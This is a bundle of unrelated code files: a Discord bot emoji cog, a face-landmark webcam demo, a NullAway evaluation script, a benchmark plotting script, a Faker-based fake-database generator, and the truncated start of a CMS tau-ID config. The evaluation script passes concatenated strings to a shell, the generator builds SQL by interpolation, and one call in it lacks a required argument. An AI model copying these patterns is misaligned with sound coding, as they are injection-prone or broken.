async def enlarge(self, ctx, emoji: Union[discord.Emoji, discord.PartialEmoji, str] = None):
prefix = ctx.clean_prefix
if emoji is None:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(embed=error_embed(
f"{EMOJIS['tick_no']} Invalid Usage!",
f"Please enter an emoji to enlarge.\nCorrect Usage: `{prefix}enlarge <emoji>`"
))
if isinstance(emoji, str):
raise commands.EmojiNotFound(emoji)
await ctx.reply(emoji.url)
@commands.cooldown(2, 10, commands.BucketType.user)
@commands.command(help="Search for emojis!", aliases=['searchemoji', 'findemoji', 'emojifind'])
async def emojisearch(self, ctx: commands.Context, name: Lower = None):
if not name:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(f"Please enter a query!\n\nExample: `{ctx.clean_prefix}emojisearch cat`")
emojis = [str(emoji) for emoji in self.client.emojis if name in emoji.name.lower() and emoji.is_usable()]
if len(emojis) == 0:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(f"Couldn't find any results for `{name}`, please try again.")
paginator = commands.Paginator(prefix="", suffix="", max_size=500)
for emoji in emojis:
paginator.add_line(emoji)
await ctx.reply(f"Found `{len(emojis)}` emojis.")
if len(paginator.pages) == 1:
return await ctx.send(paginator.pages[0])
view = PaginatorText(ctx, paginator.pages)
await ctx.send(paginator.pages[0], view=view)
@commands.cooldown(2, 10, commands.BucketType.user)
@commands.command(help="Search for stickers!", aliases=['searchsticker', 'findsticker', 'stickerfind'])
async def stickersearch(self, ctx: commands.Context, name: Lower = None):
if not name:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(f"Please enter a query!\n\nExample: `{ctx.clean_prefix}stickersearch cat`")
stickers = [sticker for sticker in self.client.stickers if name in sticker.name.lower()]
if len(stickers) == 0:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(f"Couldn't find any results for `{name}`, please try again.")
embeds = []
for sticker in stickers:
embeds.append(discord.Embed(
title=sticker.name,
description=sticker.description,
color=MAIN_COLOR,
url=sticker.url
).set_image(url=sticker.url))
await ctx.reply(f"Found `{len(embeds)}` stickers.")
if len(embeds) == 1:
return await ctx.send(embed=embeds[0])
view = Paginator(ctx, embeds)
return await ctx.send(embed=embeds[0], view=view)
@commands.command(help="Clone emojis!", aliases=['clone-emoji', 'cloneemoji'])
@commands.has_permissions(manage_emojis=True)
@commands.bot_has_permissions(manage_emojis=True)
@commands.cooldown(3, 30, commands.BucketType.user)
async def clone(self, ctx, emojis: commands.Greedy[Union[discord.PartialEmoji, discord.Emoji]] = None):
prefix = ctx.clean_prefix
if emojis is None:
return await ctx.reply(embed=error_embed(
f"{EMOJIS['tick_no']} Invalid Usage!",
f"Please enter some emojis to clone.\n\n**Example:** {prefix}clone {EMOJIS['heawt']} {EMOJIS['shy_uwu']} ..."
))
uploaded_emojis = ""
failed_emojis = ""
m = await ctx.reply(f"Cloning please wait... {EMOJIS['loading']}")
for emoji in emojis:
if isinstance(emoji, discord.PartialEmoji):
try:
emo = await ctx.guild.create_custom_emoji(
name=emoji.name,
image=await emoji.read(),
reason=f"Clone command used by {ctx.author} ({ctx.author.id})"
)
uploaded_emojis += f"{emo} "
except Exception:
failed_emojis += f"`{emoji.name}` "
else:
view = Confirm(context=ctx)
await m.edit(
content="",
embed=success_embed(
"Is this the emoji you wanted?",
f"The name `{emoji.name}` corresponds to this emote, do u want to clone this?"
).set_image(url=emoji.url),
view=view
)
await view.wait()
if view.value is None:
await m.edit(
content="",
embed=error_embed(
"You didn't respond in time.",
f"Skipped this emoji. Cloning other emojis... {EMOJIS['loading']}"
),
view=None
)
elif not view.value:
await m.edit(
content="",
embed=success_embed(
f"{EMOJIS['tick_yes']} Alright!",
"Skipped that emote."
),
view=None
)
else:
await m.edit(
content="",
embed=discord.Embed(
title=f"{EMOJIS['tick_yes']} Ok, cloning...",
color=MAIN_COLOR
),
view=None
)
try:
emo = await ctx.guild.create_custom_emoji(
name=emoji.name,
image=await emoji.read(),
reason=f"Clone command used by {ctx.author} ({ctx.author.id})"
)
uploaded_emojis += f"{emo} "
except Exception:
failed_emojis += f"`{emoji.name}` "
await m.edit(
content=f"I have cloned {uploaded_emojis}{' and failed to clone '+failed_emojis if len(failed_emojis) > 0 else ''}",
embed=None,
view=None
)
@commands.command(help="Create a sticker in your server!", aliases=['makesticker', 'create_sticker', 'make_sticker', 'create-sticker', 'make-sticker'])
@commands.cooldown(3, 10, commands.BucketType.user)
@commands.has_permissions(manage_emojis_and_stickers=True)
@commands.bot_has_permissions(manage_emojis_and_stickers=True)
async def createsticker(self, ctx: commands.Context, emoji: Optional[Union[discord.Emoji, discord.PartialEmoji]] = None, *, emoji_flags: Optional[StickerFlags] = None):
if emoji is not None:
file = discord.File(BytesIO(await emoji.read()), filename=f"{emoji.name}.png")
else:
if len(ctx.message.attachments) == 0:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(f"Please mention an emoji/upload a file to make a sticker!\n\nExample: `{ctx.clean_prefix}make-sticker :dance:`")
else:
file = await ctx.message.attachments[0].to_file()
if not emoji_flags:
name = file.filename.split(".")[0]
description = f"Uploaded by {ctx.author}"
emoji = name
else:
name = emoji_flags.name if len(emoji_flags.name) > 1 else "name"
description = emoji_flags.description if emoji_flags.description is not None else f"Uploaded by {ctx.author}"
emoji = emoji_flags.emoji or name
try:
sticker = await ctx.guild.create_sticker(
name=name,
description=description,
emoji=emoji,
file=file,
reason=f"Command used by {ctx.author}"
)
return await ctx.reply(f"{EMOJIS['tick_yes']}Sticker uploaded!", stickers=[sticker])
except Exception as e:
ctx.command.reset_cooldown(ctx)
return await ctx.reply(f"Sticker upload failed. Error: `{e}`\n\nIf this was unexpected please report it in our support server {SUPPORT_SERVER_LINK}")
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.bot:
return
if not message.guild:
return
# checking if nqn is enabled or not
guild_config = await self.client.get_guild_config(message.guild.id)
if not guild_config['nqn']:
return
# checking for blacklisted users
for e in self.client.blacklisted_cache:
if message.author.id == e['_id']:
return
# spliting the message content
pain = message.content.split(" ")
# empty string that i'll fill with cu- i mean the final nqn output text
final_msg = ""
# am iterating thru every single word in the list `pain`
for e in pain:
# spliting the word with ":" for checking if it has emoji or not
hmm = e.split(":")
# if it had emoji it would have 2 `:` in the word which means the lenght of `hmm` would atleast be `3` and if its not 3 then we dont do anything
if len(hmm) < 3:
final_msg += e + " "
# it has 2 or more `:` in the word so it has chances of having `:something:` in it
else:
i = 1
# another empty string that im gonna fill with cu- i mean text!
interesting = ""
for h in range(0, len(hmm)):
ee = hmm[h]
# now over here im checking if the word that im replacing with the emoji is in between the 2 `:`'s
# like when i split "amogus:some_emoji:amogus" i will get ["amogus", "some_emoji", "amogus"]
# so im making sure that i replace "some_emoji" with the actual emoji string
if i % 2 == 0:
# finding the emoji...
emoji = discord.utils.get(self.client.emojis, name=ee)
# here im checking if the actual word contains a nitro emoji or a fake emoji
# by nitro emoji i mean "<:emoji_name:ID>" and by fake emoji i mean ":emoji_name:"
# we only want to replace if it contains a fake emoji and not a real emoji
if emoji is not None and emoji.is_usable() and (hmm[h + 1][18: 19] != ">"):
interesting += str(emoji)
else:
interesting += ":" + ee + (":" if len(hmm) != i else "")
else:
interesting += ee
i += 1
final_msg += interesting + " "
if final_msg not in [message.content, message.content[:-1], message.content + " "]:
msg_attachments = []
for attachment in message.attachments:
uwu = await attachment.to_file()
msg_attachments.append(uwu)
await message.delete()
webhooks = await message.channel.webhooks()
webhook = discord.utils.get(webhooks, name="EpicBot NQN", user=self.client.user)
if webhook is None:
webhook = await message.channel.create_webhook(name="EpicBot NQN")
await webhook.send(
final_msg,
files=msg_attachments,
username=message.author.name,
avatar_url=message.author.display_avatar.url,
allowed_mentions=discord.AllowedMentions.none()
)
def setup(client):
client.add_cog(emojis(client))
|
# Face alignment demo
# <NAME> (<EMAIL>)
from __future__ import division
import argparse
import torch
import torch.onnx
import torchvision.transforms as transforms
import os
import cv2
import numpy as np
#import dlib
from common.utils import BBox,drawLandmark,drawLandmark_multiple
from models.basenet import MobileNet_GDConv_56
import matplotlib.pyplot as plt
from MTCNN import detect_faces
from PIL import Image
import time
parser = argparse.ArgumentParser(description='PyTorch face landmark')
# Datasets
parser.add_argument('-img', '--image', default='face76', type=str)
parser.add_argument('-j', '--workers', default=8, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--gpu_id', default='0,1', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('-c', '--checkpoint', default='checkpoint/mobilenet_56_model_best_gdconv.pth.tar', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
args = parser.parse_args()
mean = np.asarray([ 0.485, 0.456, 0.406 ])
std = np.asarray([ 0.229, 0.224, 0.225 ])
resize = transforms.Resize([56, 56])
to_tensor = transforms.ToTensor()
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
if torch.cuda.is_available():
map_location=lambda storage, loc: storage.cuda()
else:
map_location='cpu'
def load_model():
model = MobileNet_GDConv_56(136)
checkpoint = torch.load(args.checkpoint, map_location=map_location)
model.load_state_dict(checkpoint['state_dict'])
return model
if __name__ == '__main__':
import onnx
onnx_model = onnx.load("onnx/landmark_detection_56_se_external.onnx")
onnx.checker.check_model(onnx_model)
import onnxruntime
ort_session = onnxruntime.InferenceSession("onnx/landmark_detection_56_se_external.onnx")
def to_numpy(tensor):
return tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()
out_size = 56
#model = load_model()
#model = model.eval()
cap = cv2.VideoCapture(0)
success, frame = cap.read()
while success:
success, img = cap.read()
height,width,_=img.shape
# perform face detection using MTCNN
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
image = Image.fromarray(img)
faces, landmarks = detect_faces(image)
ratio=0
if len(faces)==0:
print('NO face is detected!')
continue
for k, face in enumerate(faces):
x1=face[0]
y1=face[1]
x2=face[2]
y2=face[3]
w = x2 - x1 + 1
h = y2 - y1 + 1
size = int(max([w, h])*1.1)
cx = x1 + w//2
cy = y1 + h//2
x1 = cx - size//2
x2 = x1 + size
y1 = cy - size//2
y2 = y1 + size
dx = max(0, -x1)
dy = max(0, -y1)
x1 = max(0, x1)
y1 = max(0, y1)
edx = max(0, x2 - width)
edy = max(0, y2 - height)
x2 = min(width, x2)
y2 = min(height, y2)
new_bbox = list(map(int, [x1, x2, y1, y2]))
new_bbox = BBox(new_bbox)
cropped=img[new_bbox.top:new_bbox.bottom,new_bbox.left:new_bbox.right]
if (dx > 0 or dy > 0 or edx > 0 or edy > 0):
cropped = cv2.copyMakeBorder(cropped, int(dy), int(edy), int(dx), int(edx), cv2.BORDER_CONSTANT, 0)
cropped_face = cv2.resize(cropped, (out_size, out_size))
if cropped_face.shape[0]<=0 or cropped_face.shape[1]<=0:
continue
#test_face = cv2.resize(cropped_face,(out_size,out_size))
cropped_face = cv2.cvtColor(cropped_face, cv2.COLOR_BGR2RGB)
cropped_face = Image.fromarray(cropped_face)
test_face = resize(cropped_face)
test_face = to_tensor(test_face)
test_face = normalize(test_face)
test_face.unsqueeze_(0)
start = time.time()
ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(test_face)}
ort_outs = ort_session.run(None, ort_inputs)
end = time.time()
print('Time: {:.6f}s.'.format(end - start))
landmark = ort_outs[0]
#print(landmark)
landmark = landmark.reshape(-1,2)
landmark = new_bbox.reprojectLandmark(landmark)
img = drawLandmark_multiple(img, new_bbox, landmark)
cv2.imshow('Face Alignment Demo', img)
cv2.waitKey(30)
if cv2.waitKey(10) == 27: # Esc key to stop
break
cap.release()
cv2.destroyAllWindows()
|
<filename>nullaway-eval/common.py
import sys
if sys.version_info[0] < 3:
raise Exception("Must use Python 3!")
import os.path, subprocess, configparser, logging, time, atexit
repo_prefix = "repos"
log_file = "eval.log"
stats_file = "result.csv"
#--- Do NOT change these ---
repo_list = "eval_repos.txt"
patch_prefix = "patches"
script_file = "script.sh"
arg_prefix = "compile_args"
arg_suffix = ".arg"
processors = ["nullaway","base","checkerframework","eradicate","nullsafe","gradual","dereferences","unannotated"]
config = configparser.ConfigParser()
config.read('config.ini')
nullaway_root = os.path.abspath(config.get('PATHS','nullaway'))
if not os.path.isdir(nullaway_root):
exit("Error: NullAway not found!")
os.environ["ANDROID_HOME"] = config.get('PATHS','android_sdk')
os.environ["CHECKERFRAMEWORK"] = config.get('PATHS','checkerframework')
os.environ["FB_INFER"] = config.get('PATHS','infer')
log = logging.getLogger("log")
log.setLevel(logging.DEBUG)
hdlr = logging.FileHandler(log_file)
hdlr.setFormatter(logging.Formatter('%(asctime)s| %(levelname)s: %(message)s'))
log.addHandler(hdlr)
def print_and_log(msg): log.info(msg); print(msg)
def str_from_file(path, default=""):
if os.path.exists(path):
return open(path,'r').read().replace('\n','')
return default
def list_from_file(path):
ret = []
if os.path.exists(path):
for line in open(path, 'r').read().splitlines():
if not line: break
if line.startswith('#'): continue
ret.append(line)
return ret
nerr = 0
nerr_before = 0
def check_errors():
global nerr_before
print("\033[F\t\033[1;3"+("1mFAIL" if nerr > nerr_before else "2mPASS")+" \033[0m")
nerr_before = nerr
def cmd_in_dir(dir, cmd, subdir="", tag="", outlines=20):
if not cmd: return
try:
output = subprocess.check_output("cd "+dir+"/"+subdir+" && "+cmd,shell=True,stderr=subprocess.STDOUT).decode(encoding='UTF-8')
log.debug("{}| command '{}' output:\n{}".format(tag,cmd,output))
except subprocess.CalledProcessError as e:
output = e.output.decode()
log.error("{}| command '{}' with return code {}:\n{}".format(tag,e.cmd,e.returncode,output))
global nerr
nerr += 1
return '\n'.join(output.splitlines()[-outlines:])
def is_opt(arg): return arg[0]=='-' if arg else False
start_time = time.time()
allWarns = False
daemonBuild = False
repos = []
tools = []
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
if is_opt(arg):
if arg.lower() in ["-w","-warn"]: allWarns = True
if arg.lower() in ["-d","-daemon"]: daemonBuild = True
else: tools.extend(filter(lambda p: p.startswith(arg[1:].lower()), processors))
sys.argv.remove(arg)
else:
url = cmd_in_dir(".","grep "+arg.replace(repo_prefix,'').rstrip('/')+"$ "+repo_list).rstrip()
if url: repos.append(url)
if len(sys.argv) == 1: repos = list_from_file(repo_list)
if not len(repos): exit("Error: No repos found!")
if not len(tools): tools = processors
def repo_name(repo_url): return repo_url.rpartition('/')[2]
def repo_dir(repo_url): return repo_prefix+"/"+repo_name(repo_url)
def cmd_in_repo(repo_url, cmd, subdir=""): return cmd_in_dir(repo_dir(repo_url), cmd, subdir)
def clean_repo(repo_url):
if os.path.isdir(repo_dir(repo_url)):
hash = str_from_file(patch_prefix+"/"+repo_name(repo_url)+"/hash")
if hash: cmd_in_repo(repo_url,"git checkout -f "+hash)
else: cmd_in_repo(repo_url,"git stash")
cmd_in_repo(repo_url,"git clean -fx && echo \"sdk.dir = ${ANDROID_HOME}\" > local.properties && chmod +x ./gradlew || true")
def get_repo(repo_url):
# if os.path.isdir(repo_dir(repo_url)):
# os.system("rm -rf "+repo_dir(repo_url))
if not os.path.isdir(repo_dir(repo_url)):
print_and_log("@ "+repo_name(repo_url)+": downloading...")
cmd_in_dir(".", "git clone "+repo_url+" "+repo_dir(repo_url))
clean_repo(repo_url)
def patch_file(repo_url, patch_type):
if patch_type < len(processors):
patch_path = patch_prefix+"/"+repo_name(repo_url)+"/"+processors[patch_type]
if os.path.exists(patch_path):
return os.path.abspath(patch_path)
return None
def apply_patch(repo_url, patch_type=0):
patch = patch_file(repo_url, patch_type)
if not patch: return False
print_and_log("@ "+repo_name(repo_url)+": applying patch... "+ patch)
clean_repo(repo_url)
cmd_in_repo(repo_url,"git apply "+patch)
return True
@atexit.register
def exit_fnc():
if nerr: print_and_log(str(nerr)+" errors: Check log! "+os.path.abspath(log_file))
print_and_log(time.strftime("%H:%M:%S", time.gmtime(time.time()-start_time)))
|
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.patches import Patch
import sys
inputFile=open(sys.argv[1]).readlines()
opType=sys.argv[2]
inputFile=[list(map(float,x.split("\t"))) for x in inputFile ]
def prepare(arr2):
arr=arr2.copy()
bottoms=[]
for l in arr:
bottoms.append([0]*len(l))
for i in range(len(arr[0])):
tmp=sorted(range(len(arr)),key=lambda x:arr[x][i])
for k in range(1,4):
for j in range(k):
arr[tmp[k]][i]-=arr[tmp[j]][i]
bottoms[tmp[k]][i]+=arr[tmp[j]][i]
return (arr,bottoms)
mqf_res=prepare([inputFile[0],inputFile[1],inputFile[2],inputFile[3]])
# mqf_fpr_0_01 = np.array(inputFile[0])
# mqf_fpr_0_001 = np.array(inputFile[1])
# mqf_fpr_0_0001 = np.array(inputFile[2])
# mqf_fpr_0_001-=mqf_fpr_0_0001
# mqf_fpr_0_01-=mqf_fpr_0_001+mqf_fpr_0_0001
cqf_res=prepare([inputFile[4],inputFile[5],inputFile[6],inputFile[7]])
# cqf_fpr_0_01 = np.array(inputFile[3])
# cqf_fpr_0_001 = np.array(inputFile[4])
# cqf_fpr_0_0001 = np.array(inputFile[5])
# cqf_fpr_0_001-=cqf_fpr_0_0001
# cqf_fpr_0_01-=cqf_fpr_0_001+cqf_fpr_0_0001
bmqf_res=prepare([inputFile[8],inputFile[9],inputFile[10],inputFile[11]])
# bmqf_fpr_0_01 = np.array(inputFile[6])
# bmqf_fpr_0_001 = np.array(inputFile[7])
# bmqf_fpr_0_0001 = np.array(inputFile[8])
# bmqf_fpr_0_001-=bmqf_fpr_0_0001
# bmqf_fpr_0_01-=bmqf_fpr_0_001+bmqf_fpr_0_0001
# there is a problem here because bmqf_fpr_0_01 > bmqf_fpr_0_001
CountminKhmer_res=prepare([inputFile[12],inputFile[13],inputFile[14],inputFile[15]])
# CountminKhmer_fpr_0_01 = np.array(inputFile[9])
# CountminKhmer_fpr_0_001 = np.array(inputFile[10])
# CountminKhmer_fpr_0_0001 = np.array(inputFile[11])
# CountminKhmer_fpr_0_001-=CountminKhmer_fpr_0_0001
# CountminKhmer_fpr_0_01-=CountminKhmer_fpr_0_001+CountminKhmer_fpr_0_0001
Countmin_res=prepare([inputFile[16],inputFile[17],inputFile[18],inputFile[19]])
# Countmin_fpr_0_01 = np.array(inputFile[12])
# Countmin_fpr_0_001 = np.array(inputFile[13])
# Countmin_fpr_0_0001 = np.array(inputFile[14])
# Countmin_fpr_0_001-=Countmin_fpr_0_0001
# Countmin_fpr_0_01-=Countmin_fpr_0_001+Countmin_fpr_0_0001
distributions = ["ERR1050075", "SRR11551346", "SRR12801265", "SRR12924365", "SRR12937177", "ERR992657", "SRR12873993", "SRR12989394"]
fig, ax = plt.subplots()
bar_width = 0.35
epsilon = .035
line_width = 1
opacity = 1
mqf_bar_positions = np.arange(len(mqf_res[0][0]))*2.5
cqf_bar_positions = mqf_bar_positions + bar_width
bmqf_bar_positions = mqf_bar_positions + 2*bar_width
CountminKhmer_bar_positions = mqf_bar_positions + 3*bar_width
Countmin_bar_positions = mqf_bar_positions + 4*bar_width
mqfColor='#d73027'
cqfColor='#fc8d59'
bmqfColor='#fee090'
CountminKhmerColor='#91bfdb'
CountminColor='#4575b4'
# make bar plots
mqf_fpr_0_0001_bar = plt.bar(mqf_bar_positions, mqf_res[0][3], bar_width-epsilon,
color=mqfColor,
edgecolor=mqfColor,
linewidth=line_width,
bottom=mqf_res[1][3],
label='MQF FPR 0.0001')
mqf_fpr_0_001_bar = plt.bar(mqf_bar_positions, mqf_res[0][2], bar_width-epsilon,
bottom=mqf_res[1][2],
alpha=opacity,
color='white',
edgecolor=mqfColor,
linewidth=line_width,
hatch='//',
label='MQF FPR 0.001')
mqf_fpr_0_01_bar = plt.bar(mqf_bar_positions, mqf_res[0][1], bar_width-epsilon,
bottom=mqf_res[1][1],
alpha=opacity,
color='white',
edgecolor=mqfColor,
linewidth=line_width,
hatch='0',
label='MQF FPR 0.01')
mqf_fpr_0_1_bar = plt.bar(mqf_bar_positions, mqf_res[0][0], bar_width-epsilon,
bottom=mqf_res[1][0],
alpha=opacity,
color='white',
edgecolor=mqfColor,
linewidth=line_width,
hatch='.',
label='MQF FPR 0.1')
cqf_fpr_0_0001_bar = plt.bar(cqf_bar_positions, cqf_res[0][3], bar_width- epsilon,
color=cqfColor,
bottom=cqf_res[1][3],
linewidth=line_width,
edgecolor=cqfColor,
ecolor="#0000DD",
label='CQF FPR 0.0001')
cqf_fpr_0_001_bar = plt.bar(cqf_bar_positions, cqf_res[0][2], bar_width-epsilon,
bottom=cqf_res[1][2],
color="white",
hatch='//',
edgecolor=cqfColor,
ecolor="#0000DD",
linewidth=line_width,
label='CQF FPR 0.001')
cqf_fpr_0_01_bar = plt.bar(cqf_bar_positions, cqf_res[0][1], bar_width-epsilon,
bottom=cqf_res[1][1],
color="white",
hatch='0',
edgecolor=cqfColor,
linewidth=line_width,
label='CQF FPR 0.01')
cqf_fpr_0_1_bar = plt.bar(cqf_bar_positions, cqf_res[0][0], bar_width-epsilon,
bottom=cqf_res[1][0],
color="white",
hatch='.',
edgecolor=cqfColor,
linewidth=line_width,
label='CQF FPR 0.1')
CountminKhmer_fpr_0_0001_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][3], bar_width- epsilon,
color=CountminKhmerColor,
bottom=CountminKhmer_res[1][3],
edgecolor=CountminKhmerColor,
linewidth=line_width,
label='CMS Khmer FPR 0.0001')
CountminKhmer_fpr_0_001_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][2], bar_width-epsilon,
bottom=CountminKhmer_res[1][2],
alpha=opacity,
color='white',
edgecolor=CountminKhmerColor,
linewidth=line_width,
hatch='//',
label='CMS Khmer FPR 0.001')
CountminKhmer_fpr_0_01_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][1], bar_width-epsilon,
bottom=CountminKhmer_res[1][1],
alpha=opacity,
color='white',
edgecolor=CountminKhmerColor,
linewidth=line_width,
hatch='0',
label='CMS Khmer FPR 0.01')
CountminKhmer_fpr_0_1_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][0], bar_width-epsilon,
bottom=CountminKhmer_res[1][0],
alpha=opacity,
color='white',
edgecolor=CountminKhmerColor,
linewidth=line_width,
hatch='.',
label='CMS Khmer FPR 0.1')
bmqf_fpr_0_0001_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][3], bar_width- epsilon,
bottom=bmqf_res[1][3],
color=bmqfColor,
edgecolor=bmqfColor,
linewidth=line_width,
label='Buffered MQF FPR 0.0001')
bmqf_fpr_0_001_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][2], bar_width-epsilon,
bottom=bmqf_res[1][2],
alpha=opacity,
color='white',
edgecolor=bmqfColor,
linewidth=line_width,
hatch='//',
label='Buffered MQF FPR 0.001')
bmqf_fpr_0_01_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][1], bar_width-epsilon,
bottom=bmqf_res[1][1],
alpha=opacity,
color='white',
edgecolor=bmqfColor,
linewidth=line_width,
hatch='0',
label='Buffered MQF FPR 0.01')
bmqf_fpr_0_1_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][0], bar_width-epsilon,
bottom=bmqf_res[1][0],
alpha=opacity,
color='white',
edgecolor=bmqfColor,
linewidth=line_width,
hatch='.',
label='Buffered MQF FPR 0.1')
Countmin_fpr_0_0001_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][3], bar_width- epsilon,
color=CountminColor,
bottom=Countmin_res[1][3],
edgecolor=CountminColor,
linewidth=line_width,
label='CMS FPR 0.0001')
Countmin_fpr_0_001_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][2], bar_width-epsilon,
bottom=Countmin_res[1][2],
alpha=opacity,
color='white',
edgecolor=CountminColor,
linewidth=line_width,
hatch='//',
label='CMS FPR 0.001')
Countmin_fpr_0_01_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][1], bar_width-epsilon,
bottom=Countmin_res[1][1],
alpha=opacity,
color='white',
edgecolor=CountminColor,
linewidth=line_width,
hatch='0',
label='CMS FPR 0.01')
Countmin_fpr_0_1_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][0], bar_width-epsilon,
bottom=Countmin_res[1][0],
alpha=opacity,
color='white',
edgecolor=CountminColor,
linewidth=line_width,
hatch='.',
label='CMS FPR 0.1')
plt.xticks(cqf_bar_positions-5*bar_width, distributions, rotation=45)
plt.ylabel('Million of %s Per Second'%opType)
legend_elements = [
Patch(facecolor=mqfColor,label='MQF',linewidth=0.5,edgecolor='black'),
Patch(facecolor=cqfColor,label='CQF',linewidth=0.5,edgecolor='black'),
Patch(facecolor=bmqfColor,label='Bufferd MQF',linewidth=0.5,edgecolor='black'),
Patch(facecolor=CountminKhmerColor,label='CMS Khmer',linewidth=0.5,edgecolor='black'),
Patch(facecolor=CountminColor,label='CMS',linewidth=0.5,edgecolor='black')
]
fpr_leged=[Patch(facecolor="black",label='0.0001',linewidth=0.5,edgecolor='black'),
Patch(facecolor="white",label='0.001',hatch='//',linewidth=0.5,edgecolor='black'),
Patch(facecolor="white",label='0.01',hatch='0',linewidth=0.5,edgecolor='black'),
Patch(facecolor="white",label='0.1',hatch='.',linewidth=0.5,edgecolor='black')
]
#l1=plt.legend(handles=legend_elements, bbox_to_anchor=(1.19, 0.95),
# fancybox=True,title='Data Structures')
#l2=plt.legend(handles=fpr_leged, bbox_to_anchor=(1.171, 0.650),
# fancybox=True,title='False Positive Rates')
l1=plt.legend(handles=legend_elements, bbox_to_anchor=(1., 0.95),
fancybox=True,title='Data Structures')
l2=plt.legend(handles=fpr_leged, bbox_to_anchor=(1., 0.450),
fancybox=True,title='False Positive Rates')
ax.add_artist(l1)
ax.add_artist(l2)
# plt.legend(loc='best')
#ax.legend()
# sns.despine()
#plt.show()
fig.set_size_inches(5.5, 3.5)
fig.savefig(opType+'.png',bbox_inches='tight', dpi=fig.dpi)
|
<gh_stars>0
import psycopg2 as pg
from faker import Faker
from enum import Enum, IntEnum
from typing import NamedTuple, List
import random
import re
import string
from tqdm import tqdm
from pathlib import Path
class TargetOutput(IntEnum):
postgresql = 1
csv = 2
class PostgresqlType(Enum):
date = "date"
timestamp = "timestamp"
integer = "integer"
float = "float"
text = "text"
# TODO jsonb
class Field(NamedTuple):
name: str
type: PostgresqlType
class Table(NamedTuple):
name: str
fields: List[Field]
def to_pg_name(name: str):
name_without_punctuation = re.sub("[" + string.punctuation + "]", "", name)
return "_".join(name_without_punctuation.split()).lower()
class range_field:
def __init__(self, fake, n):
self.i = 0
self.n = n
self.fake = fake
self.options_PostgresqlType = list(PostgresqlType)
def __iter__(self):
return self
def __next__(self):
if self.i < self.n:
self.i += 1
random_name = to_pg_name(self.fake.name())
return Field(random_name, random.choice(self.options_PostgresqlType))
else:
raise StopIteration()
def to_pg_schema(fake_table):
sql = f"CREATE TABLE IF NOT EXISTS {fake_table.name} ( "
sql += ", ".join(
[f"{field.name} {field.type.value}" for field in fake_table.fields]
)
sql += ")"
return sql
def generate_value(fake, field: PostgresqlType):
value = "null"
if field is PostgresqlType.text:
valid_name = fake.name().replace("'", "")
value = f"'{valid_name}'"
elif field is PostgresqlType.timestamp:
value = f"'{str(fake.date_time())}'"
elif field is PostgresqlType.date:
value = f"'{str(fake.date())}'"
elif field is PostgresqlType.integer:
value = str(random.randint(-5000, 5000))
elif field is PostgresqlType.float:
value = str(random.randint(-5000, 5000) * random.random())
return value
def generate_rows_postgresql(fake, table: Table, nb_rows: int) -> str:
values = ",".join(
[
f"({','.join([generate_value(fake,f.type) for f in table.fields])})"
for _ in range(0, nb_rows)
]
)
return f"INSERT INTO {table.name} ({','.join([f.name for f in table.fields])}) VALUES {values}"
def generate_rows_csv(fake, table: Table, nb_rows: int) -> str:
values = "\n".join(
[
f"{','.join([generate_value(fake,f.type) for f in table.fields])}"
for _ in range(0, nb_rows)
]
)
return values
def main(
target,
nb_tables,
nb_min_cols,
nb_max_cols,
nb_min_rows,
nb_max_rows,
available_types,
languages: List[str],
):
fake = Faker(languages)
if target == TargetOutput.csv:
for t in tqdm(range(nb_tables)):
# define template data
fake_fields = list(
range_field(fake, random.randint(nb_min_cols, nb_max_cols + 1))
)
fake_table = Table(to_pg_name(fake.name()), fake_fields)
with Path(f"{fake_table.name}.csv").open("w") as f:
f.write(f"{','.join([f.name for f in fake_table.fields])}\n")
rows = generate_rows_csv(
fake, fake_table, random.randint(nb_min_rows, nb_max_rows)
)
f.write(rows)
if __name__ == "__main__":
fake = Faker(["it_IT", "en_US", "ja_JP", "he_IL", "zh_CN"])
for t in range(1, 30):
# define template data
fake_fields = list(range_field(fake, random.randint(1, 50)))
fake_table = Table(to_pg_name(fake.name()), fake_fields)
conn = pg.connect(host="", database="", user="", password="")
# use for test db so no need for transaction
conn.set_session(autocommit=True)
with conn.cursor() as cur:
# create table
cur.execute(to_pg_schema(fake_table))
for i in tqdm(range(0, random.randint(1, 10000))):
rows = generate_rows_postgresql(fake_table, 1000)
cur.execute(rows)
print(f"loaded table n{t}")
|
import FWCore.ParameterSet.Config as cms
##################### Updated tau collection with MVA-based tau-Ids rerun #######
# Used only in some eras
from RecoTauTag.Configuration.loadRecoTauTagMVAsFromPrepDB_cfi import *
from RecoTauTag.RecoTau.PATTauDiscriminationByMVAIsolationRun2_cff import *
### MVAIso 2017v2
## DBoldDM
# Raw
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw = patDiscriminationByIsolationMVArun2v1raw.clone(
PATTauProducer = cms.InputTag('slimmedTaus'),
Prediscriminants = noPrediscriminants,
loadMVAfromDB = cms.bool(True),
mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2"), # name of the training you want to use
mvaOpt = cms.string("DBoldDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
